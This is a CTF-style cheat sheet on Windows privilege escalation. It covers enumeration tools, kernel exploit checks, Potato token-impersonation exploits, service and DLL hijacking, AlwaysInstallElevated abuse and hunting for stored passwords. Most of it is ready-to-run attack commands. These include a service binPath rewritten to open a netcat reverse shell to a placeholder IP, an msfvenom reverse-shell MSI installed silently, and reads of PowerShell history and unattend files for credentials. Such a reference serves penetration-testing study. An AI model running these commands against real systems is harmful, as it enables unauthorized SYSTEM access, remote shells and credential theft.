Skip to content
CTF

Windows Privilege Escalation

Advanced techniques for Windows privilege escalation: Token impersonation, Services, and Registry abuse

Windows Privilege Escalation

1. Automated Enumeration

  • WinPEAS: The best all-rounder.
    POWERSHELL 
    .\winPEASx64.exe quiet cmd fast
  • Seatbelt: C# enumeration tool.
    POWERSHELL 
    .\Seatbelt.exe -group=all
  • PowerUp: PowerShell check script.
    POWERSHELL 
    Import-Module .\PowerUp.ps1
Invoke-AllChecks

2. Kernel Exploits

  • SystemInfo: Check OS version and Hotfixes.
    POWERSHELL 
    systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
  • Watson: C# tool to identify missing KBs.
  • WesNG: Python script to analyze systeminfo output compared to CVE database.

3. Token Impersonation (Potatoes)

If you have SeImpersonatePrivilege (common on IIS/Service accounts), you can become SYSTEM.

  • Check Privs: whoami /priv
  • Exploits:
    • JuicyPotato: (Older Windows). Usage: JuicyPotato.exe -l 1337 -p cmd.exe -a "/c whoami" -t *
    • PrintSpoofer: (Newer Windows). Abuses Printer Spooler service.
      POWERSHELL 
      .\PrintSpoofer.exe -i -c cmd
    • RoguePotato / SweetPotato: Alternatives if PrintSpoofer fails.
    • GodPotato: Supports up to Windows Server 2022.

4. Service Exploitation

Services run as SYSTEM. If we can modify them, we win.

Unquoted Service Paths

If a path contains spaces and no quotes (e.g., C:\Program Files\My Service\service.exe), Windows looks for:

  1. C:\Program.exe
  2. C:\Program Files\My.exe
  • Find:
    POWERSHELL 
    wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
  • Exploit: Place your malicious binary at the interception point.

Insecure Service Permissions

If you can modify a service's configuration (binPath).

  • Check: accesschk.exe -uwcqv "Everyone" *
  • Exploit:
    POWERSHELL 
    sc config <service_name> binpath= "C:\nc.exe -e cmd.exe <IP> <PORT>"
sc stop <service_name>
sc start <service_name>

DLL Hijacking

If a service tries to load a missing DLL from a writable directory.

  1. Find: Use Process Monitor (procmon) on a local VM replica.
  2. Exploit: Place malicious DLL in the path.

5. Registry Attacks

AlwaysInstallElevated

Allows any user to run MSI files as SYSTEM.

  • Check:
    POWERSHELL 
    reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
  • Exploit:
    • Generate MSI: msfvenom -p windows/x64/shell_reverse_tcp ... -f msi -o shell.msi
    • Run: msiexec /quiet /qn /i shell.msi

AutoRuns

Check registry keys that run binaries on startup.

  • accesschk.exe -wvu "C:\Program Files\Autorun app"

6. Passwords in Files

  • Unattend.xml: Often contains base64 encoded admin passwords.
    POWERSHELL 
    dir /s /b c:\*unattend.xml*
  • PowerShell History:
    POWERSHELL 
    type C:\Users\<User>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
  • Saved Creds: cmdkey /list (If found, use runas /savecred ...)
Back to Cheatsheets
On this page